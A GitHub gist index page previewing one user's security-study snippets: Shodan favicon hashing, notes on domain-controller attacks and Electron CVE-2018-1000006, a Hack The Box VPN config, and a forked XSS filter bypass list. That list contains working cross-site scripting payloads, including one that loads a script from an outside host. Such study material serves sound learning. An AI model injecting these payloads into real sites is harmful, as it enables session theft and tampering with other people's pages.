Skip to content

Instantly share code, notes, and snippets.

@hanshou101
hanshou101 / Shodan查询.py
Last active July 27, 2021 12:58
Shodan查询
"""
参考资料:
1. [Python2写法](https://www.cnblogs.com/miaodaren/p/9177379.html)
2. [Python3改写](https://www.cnblogs.com/miaodaren/p/9177379.html)
以上两个办法,都是错误的!!!
3. [正确写法](https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a)
"""
import base64
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@hanshou101
hanshou101 / 渗透测试报告.md
Last active June 17, 2021 07:25
渗透测试报告.md
@hanshou101
hanshou101 / test.md
Created May 28, 2021 14:22
test-问题描述

1.遇到的一些问题

  1. 遇到的问题:
    1. 文章,我读了十多遍,才弄懂了前因后果:
      1. 可能的原因:
        1. 我自己之前,对【域控】的了解很少;都是一些皮毛了解,也没自己操作过。
          1. 比如,域控的用户登录
            1. 是直接远程登录? 还是 nc的shell反弹 ?
          2. 比如,【ms14-068.py】的【-d选项】,用的是【dc1.contoso.com】
            1. 而这个【域控】,在截图中,没有体现出的位置。
@hanshou101
hanshou101 / 【CVE-2018-1000006】.md
Created May 21, 2021 09:40
【CVE-2018-1000006】.md
  1. 【CVE-2018-1000006】
    1. 参考资料:
      1. 后来,补上的一篇,考古资料:
        1. Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
          1. 讲了很多,其它的【奇门相关方法】。
      2. 可直接上手复现,的Demo环境:
        1. 信息来源:Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】 - 先知社区
        2. GitHub仓库:CHYbeta/CVE-2018-1000006-DEMO: The Demo for CVE-2018-1000006
    2. Electron,在【1.8.2】及更早版本,在【协议处理程序】中 存在漏洞。
      1. 特别是,在 Win10 、Win7 、 Windows 2008 上,运行的Electron程序,可以【注册自定义协议处理程序】
<script>alert(1)</script>
@hanshou101
hanshou101 / xxsfilterbypass.lst
Created April 1, 2021 23:26 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@hanshou101
hanshou101 / eu.ovpn
Last active February 27, 2021 10:15
eu.ovpn
client
dev tun
proto udp
remote edge-eu-starting-point-vip-1.hackthebox.eu 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
@hanshou101
hanshou101 / index.js
Created February 20, 2021 05:01 — forked from stephanbogner/index.js
Create tree structure from paths array
var paths = [
["Account"],
["Account", "Payment Methods"],
["Account", "Payment Methods", "Credit Card"],
["Account", "Payment Methods", "Paypal"],
["Account", "Emails"],
["Account", "Emails", "Main Email"],
["Account", "Emails", "Backup Email"],
["Account", "Devices"],
["Account", "Devices", "Google Pixel"],